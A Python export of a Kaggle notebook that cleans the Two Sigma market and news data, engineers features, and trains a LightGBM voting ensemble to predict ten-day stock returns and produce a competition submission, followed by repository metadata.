We remove these extreme data.\n\n# In[ ]:\n\n\nprint('Removing outliers ...')\ncolumn_return = column_market + column_raw + ['returnsOpenNextMktres10']\norig_len = market_train_df.shape[0]\nfor column in column_return:\n market_train_df = market_train_df.loc[market_train_df[column]>=-2]\n market_train_df = market_train_df.loc[market_train_df[column]<=2]\nnew_len = market_train_df.shape[0]\nrmv_len = np.abs(orig_len-new_len)\nprint('There were %i lines removed' %rmv_len)\n\n# * **Remove strange data**: Here we remove data with unknown asset name or asset codes with strange behavior. For more details, see here: https://www.kaggle.com/nareyko/market-return-estimation-and-bad-data-detection\n\n# In[ ]:\n\n\nprint('Removing strange data ...')\norig_len = market_train_df.shape[0]\nmarket_train_df = market_train_df[~market_train_df['assetCode'].isin(['PGN.N','EBRYY.OB'])]\n#market_train_df = market_train_df[~market_train_df['assetName'].isin(['Unknown'])]\nnew_len = market_train_df.shape[0]\nrmv_len = np.abs(orig_len-new_len)\nprint('There were %i lines removed' %rmv_len)\n\n# ### News data\n# * **Remove outliers**: apply a clip filter to reduce too extreme data\n\n# In[ ]:\n\n\n# Function to remove outliers\ndef remove_outliers(data_frame, column_list, low=0.02, high=0.98):\n for column in column_list:\n this_column = data_frame[column]\n quant_df = this_column.quantile([low,high])\n low_limit = quant_df[low]\n high_limit = quant_df[high]\n data_frame[column] = data_frame[column].clip(lower=low_limit, upper=high_limit)\n return data_frame\n\n# In[ ]:\n\n\n# Remove outlier\ncolumns_outlier = ['takeSequence', 'bodySize', 'sentenceCount', 'wordCount', 'sentimentWordCount', 'firstMentionSentence','noveltyCount12H',\\\n 'noveltyCount24H', 'noveltyCount3D', 'noveltyCount5D', 'noveltyCount7D', 'volumeCounts12H', 'volumeCounts24H',\\\n 'volumeCounts3D','volumeCounts5D','volumeCounts7D']\nprint('Clipping news outliers ...')\nnews_train_df = remove_outliers(news_train_df, columns_outlier)\n\n# \n# \n# ## Features engineering\n# \n# ### Data processing function\n# Here we make a function process both market and news data, then merge them.\n# \n\n# In[ ]:\n\n\nasset_code_dict = {k: v for v, k in enumerate(market_train_df['assetCode'].unique())}\ndrop_columns = [col for col in news_train_df.columns if col not in ['sourceTimestamp', 'urgency', 'takeSequence', 'bodySize', 'companyCount', \n 'sentenceCount', 'firstMentionSentence', 'relevance','firstCreated', 'assetCodes']]\ncolumns_news = ['firstCreated','relevance','sentimentClass','sentimentNegative','sentimentNeutral',\n 'sentimentPositive','noveltyCount24H','noveltyCount7D','volumeCounts24H','volumeCounts7D','assetCodes','sourceTimestamp',\n 'assetName','audiences', 'urgency', 'takeSequence', 'bodySize', 'companyCount', \n 'sentenceCount', 'firstMentionSentence','time']\n\n# In[ ]:\n\n\n# Data processing function\ndef data_prep(market_df,news_df):\n market_df['date'] = market_df.time.dt.date\n market_df['close_to_open'] = market_df['close'] / market_df['open']\n market_df.drop(['time'], axis=1, inplace=True)\n \n news_df = news_df[columns_news]\n news_df['sourceTimestamp']= news_df.sourceTimestamp.dt.hour\n news_df['firstCreated'] = news_df.firstCreated.dt.date\n news_df['assetCodesLen'] = news_df['assetCodes'].map(lambda x: len(eval(x)))\n news_df['assetCodes'] = news_df['assetCodes'].map(lambda x: list(eval(x))[0])\n news_df['asset_sentiment_count'] = news_df.groupby(['assetName', 'sentimentClass'])['time'].transform('count')\n news_df['len_audiences'] = 
news_train_df['audiences'].map(lambda x: len(eval(x)))\n kcol = ['firstCreated', 'assetCodes']\n news_df = news_df.groupby(kcol, as_index=False).mean()\n market_df = pd.merge(market_df, news_df, how='left', left_on=['date', 'assetCode'], \n right_on=['firstCreated', 'assetCodes'])\n del news_df\n market_df['assetCodeT'] = market_df['assetCode'].map(asset_code_dict)\n market_df = market_df.drop(columns = ['firstCreated','assetCodes','assetName']).fillna(0) \n return market_df\n\n# In[ ]:\n\n\nprint('Merging data ...')\nmarket_train_df = data_prep(market_train_df, news_train_df)\nmarket_train_df.head()\n\n# \n# \n# ### Data selection\n# \n# Looking at the statistics, most data behave homogeneously after 2009 (volume increase, price increase, etc.). However, before 2009, due to the burst of the housing bubble that leads to the financial crisis in 2008, the data behaves differently. So the question to make the right prediction for this problem is: **Will there be a financial crisis in the next 6 months?** If the answer is **Yes**, then we include data before 2009. If the answer is **No**, then we exclude them.\n# \n# In this notebook, I choose **No** as the answer and proceed from that.\n\n# In[ ]:\n\n\nmarket_train_df = market_train_df.loc[market_train_df['date']>=datetime.date(2009,1,1)]\n\n# We then perform feature selection . Feature scaling is not needed since we plan to use lightgbm - a tree-based model, which do not require standardization.\n# \n# I tried using a regressor model, but a problem is that it gives close-to-0 values for most of prediction. Thus, I convert this problem into a classification problem: 0 for negative return and 1 for positive return\n\n# In[ ]:\n\n\nnum_columns = ['volume', 'close', 'open', 'returnsClosePrevRaw1', 'returnsOpenPrevRaw1', 'returnsClosePrevMktres1', 'returnsOpenPrevMktres1', 'returnsClosePrevRaw10', 'returnsOpenPrevRaw10', \n 'returnsClosePrevMktres10', 'returnsOpenPrevMktres10', 'close_to_open', 'sourceTimestamp', 'urgency', 'companyCount', 'takeSequence', 'bodySize', 'sentenceCount',\n 'relevance', 'sentimentClass', 'sentimentNegative', 'sentimentNeutral', 'sentimentPositive',\n 'noveltyCount24H','noveltyCount7D','volumeCounts24H','volumeCounts7D','assetCodesLen', 'asset_sentiment_count', 'len_audiences']\ncat_columns = ['assetCodeT']\nfeature_columns = num_columns+cat_columns\n\n# In[ ]:\n\n\n# Scaling of data\nfrom sklearn.preprocessing import StandardScaler, MinMaxScaler\n\ndata_scaler = StandardScaler()\n#market_train_df[num_columns] = data_scaler.fit_transform(market_train_df[num_columns])\n#data_scaler = MinMaxScaler()\nmarket_train_df[num_columns] = data_scaler.fit_transform(market_train_df[num_columns])\n\n# In[ ]:\n\n\nfrom sklearn.model_selection import train_test_split\n\nmarket_train_df = market_train_df.reset_index()\nmarket_train_df = market_train_df.drop(columns='index')\n\n# Random train-test split\ntrain_indices, val_indices = train_test_split(market_train_df.index.values,test_size=0.1, random_state=92)\n\n# In[ ]:\n\n\n# Extract X and Y\ndef get_input(market_train, indices):\n X = market_train.loc[indices, feature_columns].values\n y = market_train.loc[indices,'returnsOpenNextMktres10'].map(lambda x: 0 if x<0 else 1).values\n #y = market_train.loc[indices,'returnsOpenNextMktres10'].map(lambda x: convert_to_class(x)).values\n r = market_train.loc[indices,'returnsOpenNextMktres10'].values\n u = market_train.loc[indices, 'universe']\n d = market_train.loc[indices, 'date']\n return X,y,r,u,d\n\n# r, u and d are used to calculate the 
scoring metric\nX_train,y_train,r_train,u_train,d_train = get_input(market_train_df, train_indices)\nX_val,y_val,r_val,u_val,d_val = get_input(market_train_df, val_indices)\n\n# \n# \n# ## Building model\n# \n# Here we use lightgbm classifier as our model\n# \n# ### Parameters tuning\n\n# In[ ]:\n\n\n# Set up decay learning rate\ndef learning_rate_power(current_round):\n base_learning_rate = 0.19000424246380565\n min_learning_rate = 0.01\n lr = base_learning_rate * np.power(0.995,current_round)\n return max(lr, min_learning_rate)\n\n# In[ ]:\n\n\nfrom scipy.stats import randint as sp_randint\nfrom scipy.stats import uniform as sp_uniform\n\ntune_params = {'n_estimators': [200,500,1000,2500,5000],\n 'max_depth': sp_randint(4,12),\n 'colsample_bytree':sp_uniform(loc=0.8, scale=0.15),\n 'min_child_samples':sp_randint(60,120),\n 'subsample': sp_uniform(loc=0.75, scale=0.25),\n 'reg_lambda':[1e-3, 1e-2, 1e-1, 1]}\n\nfit_params = {'early_stopping_rounds':40,\n 'eval_metric': 'accuracy',\n 'eval_set': [(X_train, y_train), (X_val, y_val)],\n 'verbose': 20,\n 'callbacks': [lgb.reset_parameter(learning_rate=learning_rate_power)]}\n\n# In[ ]:\n\n\nlgb_clf = lgb.LGBMClassifier(n_jobs=4, objective='binary',random_state=1)\ngs = RandomizedSearchCV(estimator=lgb_clf, \n param_distributions=tune_params, \n n_iter=40,\n scoring='f1',\n cv=5,\n refit=True,\n random_state=1,\n verbose=True)\n\n# Running the parameters search will take another 3 hours, so we will straight away use the best parameters \n\n# In[ ]:\n\n\nlgb_clf = lgb.LGBMClassifier(n_jobs=4,\n objective='multiclass',\n random_state=100)\nopt_params = {'n_estimators':500,\n 'boosting_type': 'dart',\n 'objective': 'binary',\n 'num_leaves':2452,\n 'min_child_samples':212,\n 'reg_lambda':0.01}\nlgb_clf.set_params(**opt_params)\nlgb_clf.fit(X_train, y_train,**fit_params)\n\n# In[ ]:\n\n\nprint('Training accuracy: ', accuracy_score(y_train, lgb_clf.predict(X_train)))\nprint('Validation accuracy: ', accuracy_score(y_val, lgb_clf.predict(X_val)))\n\n# \n# \n# ### Visualizing the result\n\n# In[ ]:\n\n\nfeatures_imp = pd.DataFrame()\nfeatures_imp['features'] = list(feature_columns)[:]\nfeatures_imp['importance'] = lgb_clf.feature_importances_\nfeatures_imp = features_imp.sort_values(by='importance', ascending=False).reset_index()\n\ny_plot = -np.arange(15)\nplt.figure(figsize=(10,6))\nplt.barh(y_plot, features_imp.loc[:14,'importance'].values)\nplt.yticks(y_plot,(features_imp.loc[:14,'features']))\nplt.xlabel('Feature importance')\nplt.title('Features importance')\nplt.tight_layout()\n\n# In[ ]:\n\n\n# Rescale confidence\ndef rescale(data_in, data_ref):\n scaler_ref = StandardScaler()\n scaler_ref.fit(data_ref.reshape(-1,1))\n scaler_in = StandardScaler()\n data_in = scaler_in.fit_transform(data_in.reshape(-1,1))\n data_in = scaler_ref.inverse_transform(data_in)[:,0]\n return data_in\n\n# In[ ]:\n\n\ndef confidence_out(y_pred):\n confidence = np.zeros(y_pred.shape[0])\n for i in range(len(confidence)):\n if y_pred[i,:].argmax() != 1:\n confidence[i] = y_pred[i,2]-y_pred[i,0]\n return confidence\n\n# In[ ]:\n\n\ny_pred_proba = lgb_clf.predict_proba(X_val)\npredicted_return = y_pred_proba[:,1] - y_pred_proba[:,0]\n#predicted_return = confidence_out(y_pred_proba)\npredicted_return = rescale(predicted_return, r_train)\n\n# In[ ]:\n\n\n# distribution of confidence that will be used as submission\nplt.hist(predicted_return, bins='auto', label='Predicted confidence')\nplt.hist(r_val, bins='auto',alpha=0.8, label='True market return')\nplt.title(\"predicted 
confidence\")\nplt.legend(loc='best')\nplt.xlim(-1,1)\nplt.show()\n\n# In[ ]:\n\n\n# calculation of actual metric that is used to calculate final score\nr_val = r_val.clip(-1,1) # get rid of outliers.\nx_t_i = predicted_return * r_val * u_val\ndata = {'day' : d_val, 'x_t_i' : x_t_i}\ndf = pd.DataFrame(data)\nx_t = df.groupby('day').sum().values.flatten()\nmean = np.mean(x_t)\nstd = np.std(x_t)\nscore_valid = mean / std\nprint('Validation score', score_valid)\n\n# \n# ### Voting ensemble\n# Now we construct an ensemble of multiple classifier and use soft voting to get the final result\n\n# In[ ]:\n\n\n# This code is inspired from this kernel: https://www.kaggle.com/skooch/lgbm-w-random-split-2\nclfs = []\nfor i in range(20):\n clf = lgb.LGBMClassifier(learning_rate=0.1, random_state=1200+i, silent=True,\n n_jobs=4, n_estimators=2500)\n clf.set_params(**opt_params)\n clfs.append(('lgbm%i'%i, clf))\n\ndef split_data(X, y, test_percentage=0.2, seed=None):\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=test_percentage)\n return X_train, y_train, X_test, y_test \n\ndef _parallel_fit_estimator(estimator, X, y, sample_weight=None, **fit_params):\n \n # randomly split the data so we have a test set for early stopping\n X_train, y_train, X_test, y_test = split_data(X, y, seed=1992)\n \n # update the fit params with our new split\n fit_params[\"eval_set\"] = [(X_train,y_train), (X_test,y_test)]\n \n # fit the estimator\n if sample_weight is not None:\n estimator.fit(X_train, y_train, sample_weight=sample_weight, **fit_params)\n else:\n estimator.fit(X_train, y_train, **fit_params)\n return estimator\n\n# In[ ]:\n\n\nclass VotingClassifierLGBM(VotingClassifier):\n '''\n This implements the fit method of the VotingClassifier propagating fit_params\n '''\n def fit(self, X, y, sample_weight=None, **fit_params):\n \n if isinstance(y, np.ndarray) and len(y.shape) > 1 and y.shape[1] > 1:\n raise NotImplementedError('Multilabel and multi-output'\n ' classification is not supported.')\n\n if self.voting not in ('soft', 'hard'):\n raise ValueError(\"Voting must be 'soft' or 'hard'; got (voting=%r)\"\n % self.voting)\n\n if self.estimators is None or len(self.estimators) == 0:\n raise AttributeError('Invalid `estimators` attribute, `estimators`'\n ' should be a list of (string, estimator)'\n ' tuples')\n\n if (self.weights is not None and\n len(self.weights) != len(self.estimators)):\n raise ValueError('Number of classifiers and weights must be equal'\n '; got %d weights, %d estimators'\n % (len(self.weights), len(self.estimators)))\n\n if sample_weight is not None:\n for name, step in self.estimators:\n if not has_fit_parameter(step, 'sample_weight'):\n raise ValueError('Underlying estimator \\'%s\\' does not'\n ' support sample weights.' % name)\n names, clfs = zip(*self.estimators)\n self._validate_names(names)\n\n n_isnone = np.sum([clf is None for _, clf in self.estimators])\n if n_isnone == len(self.estimators):\n raise ValueError('All estimators are None. 
At least one is '\n                             'required to be a classifier!')\n\n        self.le_ = LabelEncoder().fit(y)\n        self.classes_ = self.le_.classes_\n        self.estimators_ = []\n\n        transformed_y = self.le_.transform(y)\n\n        self.estimators_ = Parallel(n_jobs=self.n_jobs)(\n                delayed(_parallel_fit_estimator)(clone(clf), X, transformed_y,\n                    sample_weight=sample_weight, **fit_params)\n                for clf in clfs if clf is not None)\n\n        return self\n\n# In[ ]:\n\n\nvc = VotingClassifierLGBM(clfs, voting='soft')\nvc.fit(X_train, y_train, **fit_params)\nfilename = 'VotingClassifierLGBM.sav'\npickle.dump(vc, open(filename, 'wb'))\n\n# In[ ]:\n\n\nvc = pickle.load(open(filename, 'rb'))\nvc.voting = 'soft'\npredicted_class = vc.predict(X_val)\n# note: predict_proba is called twice here; only the second result is kept\npredicted_return = vc.predict_proba(X_val)\n#predicted_return = confidence_out(predicted_return)\npredicted_return = vc.predict_proba(X_val)[:,1]*2-1\npredicted_return = rescale(predicted_return, r_train)\n\n# In[ ]:\n\n\nplt.hist(predicted_class, bins='auto')\n\n# In[ ]:\n\n\nvc.voting = 'soft'\nglobal_accuracy_soft = accuracy_score(y_val, predicted_class)\nglobal_f1_soft = f1_score(y_val, predicted_class)\nprint('Accuracy score clfs: %f' % global_accuracy_soft)\nprint('F1 score clfs: %f' % global_f1_soft)\n\n# In[ ]:\n\n\n# distribution of confidence that will be used as submission\nplt.hist(predicted_return, bins='auto', label='Predicted confidence')\nplt.hist(r_val, bins='auto',alpha=0.8, label='True market return')\nplt.title(\"predicted confidence\")\nplt.legend(loc='best')\nplt.xlim(-1,1)\nplt.show()\n\n# In[ ]:\n\n\n# calculation of the actual metric that is used to compute the final score\nr_val = r_val.clip(-1,1) # get rid of outliers by clipping returns to [-1, 1]\nx_t_i = predicted_return * r_val * u_val\ndata = {'day' : d_val, 'x_t_i' : x_t_i}\ndf = pd.DataFrame(data)\nx_t = df.groupby('day').sum().values.flatten()\nmean = np.mean(x_t)\nstd = np.std(x_t)\nscore_valid = mean / std\nprint('Validation score', score_valid)\n\n# \n# ## Making submission\n\n# In[ ]:\n\n\ndays = env.get_prediction_days()\nn_days = 0\nprep_time = 0\nprediction_time = 0\npackaging_time = 0\nfor (market_obs_df, news_obs_df, predictions_template_df) in days:\n    n_days +=1\n    if n_days % 50 == 0:\n        print(n_days,end=' ')\n\n    t = time.time()\n    column_market = ['returnsClosePrevMktres1','returnsOpenPrevMktres1','returnsClosePrevMktres10', 'returnsOpenPrevMktres10']\n    column_raw = ['returnsClosePrevRaw1', 'returnsOpenPrevRaw1','returnsClosePrevRaw10', 'returnsOpenPrevRaw10']\n    market_obs_df['close_open_ratio'] = np.abs(market_obs_df['close']/market_obs_df['open'])\n    for i in range(len(column_raw)):\n        market_obs_df[column_market[i]] = market_obs_df[column_market[i]].fillna(market_obs_df[column_raw[i]])\n\n    market_obs_df = market_obs_df[market_obs_df.assetCode.isin(predictions_template_df.assetCode)]\n    market_obs_df = market_obs_df[market_obs_df.assetCode.isin(asset_code_dict.keys())]\n    market_obs = data_prep(market_obs_df, news_obs_df)\n    market_obs[num_columns] = data_scaler.transform(market_obs[num_columns])\n    X_live = market_obs[feature_columns].values\n    prep_time += time.time() - t\n\n    t = time.time()\n    lp = vc.predict_proba(X_live)\n    prediction_time += time.time() -t\n\n    t = time.time()\n    confidence = lp[:,1] - lp[:,0]\n    #confidence = confidence_out(lp)\n    confidence = rescale(confidence, r_train)\n    preds = pd.DataFrame({'assetCode':market_obs['assetCode'],'confidence':confidence})\n    predictions_template_df = predictions_template_df.merge(preds,how='left').drop('confidenceValue',axis=1).fillna(0).rename(columns={'confidence':'confidenceValue'})\n    
env.predict(predictions_template_df)\n packaging_time += time.time() - t\n\nenv.write_submission_file()\n\n# In[ ]:\n\n\nplt.hist(confidence, bins='auto')\nplt.title(\"predicted confidence\")\nplt.show()\n\n# This concludes my work for this problem. Please let me know if you have any suggestion. Thank you\n\n# \n", "repo_name": "tetherless-world/CodeGraph", "sub_path": "kaggle/python_files/sample166.py", "file_name": "sample166.py", "file_ext": "py", "file_size_in_byte": 41922, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "matplotlib.rcParams", "line_number": 31, "usage_type": "attribute"}, {"api_name": "matplotlib.rcParams", "line_number": 32, "usage_type": "attribute"}, {"api_name": "random.seed", "line_number": 35, "usage_type": "call"}, {"api_name": "warnings.filterwarnings", "line_number": 56, "usage_type": "call"}, {"api_name": "matplotlib.rcParams", "line_number": 61, "usage_type": "attribute"}, {"api_name": "matplotlib.rcParams", "line_number": 62, "usage_type": "attribute"}, {"api_name": "kaggle.competitions.twosigmanews.make_env", "line_number": 69, "usage_type": "call"}, {"api_name": "kaggle.competitions.twosigmanews", "line_number": 69, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 124, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 124, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 125, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 125, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 126, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 126, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 127, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 127, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 128, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 128, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 134, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 134, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 135, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 135, "usage_type": "name"}, {"api_name": "pandas.to_datetime", "line_number": 155, "usage_type": "call"}, {"api_name": "numpy.log10", "line_number": 156, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.hist", "line_number": 161, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 161, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 161, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 162, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 162, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 163, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 163, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 164, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 164, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 173, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 173, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 198, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 
198, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 199, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 199, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 200, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 200, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.gca", "line_number": 201, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 201, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 216, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 216, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 217, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 217, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 218, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 218, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.gca", "line_number": 219, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 219, "usage_type": "name"}, {"api_name": "re.sub", "line_number": 230, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 231, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 258, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 260, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 260, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 261, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 261, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 262, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 262, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.gca", "line_number": 263, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 263, "usage_type": "name"}, {"api_name": "pandas.Series", "line_number": 277, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 279, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 279, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 280, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 280, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 281, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 281, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.gca", "line_number": 282, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 282, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 289, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 290, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 290, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 291, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 291, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 305, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 305, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 306, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 306, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 307, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 
307, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.gca", "line_number": 308, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 308, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 320, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 321, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 321, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 322, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 322, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 323, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 323, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 337, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 338, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 338, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 339, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 339, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 340, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 340, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 347, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 347, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 348, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 348, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.gca", "line_number": 349, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 349, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 358, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 358, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 359, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 359, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 360, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 360, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 361, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 361, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 362, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 362, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 369, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 369, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 370, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 370, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 371, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 371, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 372, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 372, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 373, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 373, "usage_type": "name"}, {"api_name": "numpy.linspace", "line_number": 382, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 383, "usage_type": "call"}, {"api_name": 
"matplotlib.pyplot", "line_number": 383, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 384, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 384, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 385, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 385, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 391, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 391, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.gca", "line_number": 406, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 406, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 407, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 407, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 408, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 408, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.cm", "line_number": 451, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 451, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 452, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 452, "usage_type": "name"}, {"api_name": "seaborn.heatmap", "line_number": 453, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 454, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 454, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 490, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 490, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 498, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 498, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 499, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 499, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 500, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 500, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 501, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 501, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 502, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 502, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 509, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 509, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 510, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 510, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 511, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 511, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 512, "usage_type": "call"}, {"api_name": 